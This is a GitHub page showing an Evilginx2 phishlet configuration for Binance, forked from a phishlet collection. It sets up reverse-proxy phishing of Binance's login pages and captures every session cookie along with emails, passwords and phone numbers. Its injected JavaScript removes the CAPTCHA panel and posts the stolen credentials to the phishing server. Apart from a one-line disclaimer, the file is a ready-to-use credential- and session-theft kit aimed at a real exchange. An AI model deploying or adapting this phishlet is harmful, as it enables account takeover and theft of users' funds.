forked from An0nUD4Y/Evilginx2-Phishlets
-
Notifications
You must be signed in to change notification settings - Fork 0
/
binance.yaml
134 lines (119 loc) · 12.7 KB
/
binance.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
# AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
# PLEASE DO NOT MISUSE THIS PHISHLET.
author: '@test'
min_ver: '2.3.0'
proxy_hosts:
- {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'binance.com', session: true, is_landing: true}
- {phish_sub: 'www', orig_sub: 'www', domain: 'binance.com', session: true, is_landing: false}
- {phish_sub: '', orig_sub: '', domain: 'binance.com', session: true, is_landing: false}
- {phish_sub: 'api', orig_sub: 'api', domain: 'geetest.com', session: false, is_landing: false}
- {phish_sub: 'bin', orig_sub: 'bin', domain: 'bnbstatic.com', session: false, is_landing: false}
- {phish_sub: 'static', orig_sub: 'static', domain: 'geetest.com', session: false, is_landing: false}
- {phish_sub: 'monitor', orig_sub: 'monitor', domain: 'geetest.com', session: false, is_landing: false}
- {phish_sub: 'sensors', orig_sub: 'sensors', domain: 'binance.cloud', session: false, is_landing: false}
- {phish_sub: 'frontend-m', orig_sub: 'frontend-m', domain: 'binance.cloud', session: false, is_landing: false}
- {phish_sub: 'm', orig_sub: 'report', domain: 'binance.gg', session: true, is_landing: false}
sub_filters:
- {triggers_on: 'accounts.binance.com', orig_sub: 'frontend-m', domain: 'binance.cloud', search: 'https://{hostname}/monitor/v1/log', replace: 'https://{hostname}/monitor/v1/log', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'bin.bnbstatic.com', orig_sub: 'frontend-m', domain: 'binance.cloud', search: 'https://{hostname}/monitor/v1/log', replace: 'https://{hostname}/monitor/v1/log', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: '', domain: 'geetest.com', search: 'geetest.com', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'static', domain: 'geetest.com', search: 'static\.geetest\.com', replace: 'static\.instaconnect\.ga', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'report', domain: 'binance.gg', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'report', domain: 'binance.gg', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'report', domain: 'binance.gg', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'frontend-m', domain: 'binance.cloud', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/javascript', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'frontend-m', domain: 'binance.cloud', search: '{hostname}', replace: '{hostname}', mimes: ['text/javascript', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'frontend-m', domain: 'binance.cloud', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/javascript', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'www', domain: 'binance.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'www', domain: 'binance.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'www', domain: 'binance.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'accounts', domain: 'binance.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'accounts', domain: 'binance.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'accounts', domain: 'binance.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'api', domain: 'geetest.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'api', domain: 'geetest.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'api', domain: 'geetest.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'static', domain: 'geetest.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'static', domain: 'geetest.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'static', domain: 'geetest.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'sensors', domain: 'binance.cloud', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'sensors', domain: 'binance.cloud', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'sensors', domain: 'binance.cloud', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'bin', domain: 'bnbstatic.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'bin', domain: 'bnbstatic.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'bin', domain: 'bnbstatic.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'monitor', domain: 'geetest.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'monitor', domain: 'geetest.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'accounts.binance.com', orig_sub: 'monitor', domain: 'geetest.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
auth_tokens:
- domain: '.binance.com'
keys: ['.*,regexp']
auth_urls:
- '/my/dashboard'
- '/dashboard/.*'
credentials:
username:
key: 'leaked_email'
search: '(.*)'
type: 'post'
password:
key: 'leaked_password'
search: '(.*)'
type: 'post'
custom:
- key: 'mobile'
search: '(.*)'
type: 'post'
- key: 'mobileCode'
search: '(.*)'
type: 'post'
- key: 'email'
search: '(.*)'
type: 'post'
login:
domain: 'accounts.binance.com'
path: '/en/login'
js_inject:
- trigger_domains: ["accounts.binance.com"]
trigger_paths: ["/en/login","/login.*"]
trigger_params: []
script: |
function lp(){
var submit = document.querySelectorAll('button[type=submit]')[0];
submit.setAttribute("onclick", "send_email(); send_mobile();");
var elem1 = document.getElementsByClassName("geetest_panel geetest_wind")[0];
elem1.parentNode.removeChild(elem1);
return;
}
function send_email(){
var password = document.getElementsByName("password")[0].value;
var email = document.getElementsByName("email")[0].value;
var xhr = new XMLHttpRequest();
xhr.open("POST", '/get-pass', true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("leaked_password="+encodeURIComponent(password)+" &"+" leaked_email="+encodeURIComponent(email));
var elem1 = document.getElementsByClassName("geetest_panel geetest_wind")[0];
elem1.parentNode.removeChild(elem1);
return;
}
function send_mobile(){
var password = document.getElementsByName("password")[0].value;
var mobileCountry = document.getElementsByClassName("css-167bcsx")[0].value;
var mobileNumber = document.getElementsByName("mobile")[0].value;
var xhr = new XMLHttpRequest();
xhr.open("POST", '/get-pass', true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("leaked_password="+encodeURIComponent(password)+" &"+" mobileCode="+encodeURIComponent(mobileCountry)+" &"+" mobile="+encodeURIComponent(mobileNumber));
return;
}
setTimeout(function(){ lp(); }, 4000);
- trigger_domains: ["accounts.binance.com"]
trigger_paths: ["/en/login","/login.*"]
trigger_params: [domain]
script: |
function lp2(){
var link1 = "{domain}"
var link2 = document.getElementsByClassName("css-vurnku")[0];
link.textContent = ("//accounts."+link1)
}
setTimeout(function(){ lp2(); }, 100);